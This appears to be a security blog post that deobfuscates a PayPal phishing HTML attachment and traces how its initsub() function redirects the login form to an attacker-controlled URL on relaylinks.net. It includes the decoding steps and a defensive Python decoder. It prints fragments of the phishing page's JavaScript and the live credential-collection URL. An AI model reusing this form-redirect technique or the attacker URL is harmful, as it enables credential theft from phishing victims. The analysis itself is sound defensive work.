A PayPal phishing campaign that uses obfuscated HTML attachments has been active for the past few months.
In most cases, the HTML attachments sent to phish for credentials are not obfuscated. This allows easy static analysis, and security products detect them successfully. Obfuscated HTML pages, however, are harder to detect.
In this article we will look at obfuscated HTML attachments used in PayPal phishing campaigns and how they can be analyzed effectively.
The obfuscated HTML attachment looks as shown in Figure 1.
Figure 1: Obfuscated HTML Page
The PayPal phishing page, when opened in a browser, looks as shown in Figure 2. We can see that it requests personal information from the user.
Figure 2: PayPal Phishing Page
Now, let us look at how the HTML page can be deobfuscated. We can see in Figure 3 that after the code is deobfuscated at runtime, it is rendered in the browser using document.write().
Figure 3: Document.write in Obfuscated HTML page.
To see the deobfuscated code, we will display the value in a textarea box instead of rendering it. This can be done by modifying the document.write() statement in the original obfuscated HTML page as shown in Figure 4.
Figure 4: Modify document.write() in Obfuscated HTML page
When we open the modified HTML page in a browser, we can see the complete deobfuscated code as shown in Figure 5.
Figure 5: Deobfuscated HTML Page
If we look at the HTML form in the deobfuscated page, we can see that the form's action attribute points to http://paypal.com, as shown in Figure 6. In most phishing HTML pages, the form's action field points to an attacker-controlled web server. The action pointing at the legitimate domain is what makes this instance of PayPal phishing interesting.
Figure 6: HTML Form's action field in deobfuscated HTML page.
So, how is the HTML form's action field modified at runtime? It is done using the JavaScript function initsub(). In Figure 7, we can see that initsub() is called when the HTML form is submitted.
Figure 7: JavaScript function called when HTML form is submitted.
The JavaScript function initsub() is shown in Figure 8.
Figure 8: JavaScript function, initsub()
We can see an obfuscated array in the JavaScript above. The array variable is named _0xf7b4. It contains strings represented as escaped ASCII byte values rather than readable text. To display the actual strings, we can use Mozilla Firefox's Web Console as shown in Figure 9: when we enter the array name in the Web Console, all of its strings are printed in decoded form.
Figure 9: Decode the Array using Firefox's Web Console
We can identify the HTML form's action URL from the following lines of initsub():
var _0x13632f = "fb60d411a5c5b72b2e7d3527cfc84fd0.php"; // file name on the attacker's server
var _0x1a7d65 = _0xf7b4[2];                             // decoded array member: "http://relaylinks.net/"
_0x1a7d65 += _0x13632f;                                 // final action URL used at submit time
The complete URL is: http://relaylinks.net/fb60d411a5c5b72b2e7d3527cfc84fd0.php
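As an added example (not code from the original post), the following Python script does statically what the Web Console step above does interactively: it decodes a _0x-style string array and rebuilds the runtime form action from the concatenation pattern shown above, without executing the attachment. The JavaScript sample is constructed to mirror the post's description; only the array name and the three concatenation lines come from the post, while the other array members and the final setAttribute() call are assumptions.

```python
import re
from typing import Optional

# Constructed sample that mirrors the post's description. Only the array name and the
# three concatenation lines come from the post; the other members and the final
# setAttribute() call are assumptions made for this example.
SAMPLE_JS = r'''
var _0xf7b4=["\x61\x63\x74\x69\x6F\x6E","\x73\x75\x62\x6D\x69\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x6C\x61\x79\x6C\x69\x6E\x6B\x73\x2E\x6E\x65\x74\x2F"];
function initsub(){
  var _0x13632f = "fb60d411a5c5b72b2e7d3527cfc84fd0.php";
  var _0x1a7d65 = _0xf7b4[2];
  _0x1a7d65+=_0x13632f;
  document.forms[0].setAttribute(_0xf7b4[0], _0x1a7d65);
}
'''
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})')  # "ASCII value" escapes
ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-f]+)\s*=\s*\[(.*?)\];', re.S)  # var _0x..=[...];
CONCAT_RE = re.compile(  # var X = "lit"; ... var Y = _0xARR[N]; ... Y += X;
    r'var\s+(\w+)\s*=\s*"([^"]*)"\s*;.*?'
    r'var\s+(\w+)\s*=\s*(_0x[0-9a-f]+)\[(\d+)\]\s*;.*?'
    r'\3\s*\+=\s*\1\s*;', re.S)

def decode_js_escapes(s: str) -> str:
    """Resolve \\xNN / \\uNNNN escapes to characters, as the Web Console prints them."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def extract_string_arrays(js: str) -> dict:
    """Map each obfuscated array name to its decoded member strings."""
    arrays = {}
    for name, body in ARRAY_RE.findall(js):
        members = re.findall(r'"((?:[^"\\]|\\.)*)"', body)
        arrays[name] = [decode_js_escapes(m) for m in members]
    return arrays

def resolve_action_url(js: str) -> Optional[str]:
    """Rebuild the URL initsub() assembles at runtime, without executing the script."""
    arrays = extract_string_arrays(js)
    m = CONCAT_RE.search(js)
    if not m:
        return None
    literal, arr, idx = m.group(2), m.group(4), int(m.group(5))
    if arr not in arrays or idx >= len(arrays[arr]):
        return None
    return arrays[arr][idx] + literal

if __name__ == "__main__":
    print(extract_string_arrays(SAMPLE_JS))
    print("form action at runtime:", resolve_action_url(SAMPLE_JS))
```

Run it against the deobfuscated HTML (the textarea output from Figure 5) to recover the real submission URL for blocking and reporting without opening the attachment in a browser.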
A Whois lookup for the domain relaylinks.net shows that it was registered on 17th August 2015.
Most of the domains used in this PayPal phishing campaign were registered recently by the attackers.
I will soon post a list of different domains and the complete URLs used for phishing.
Thanks.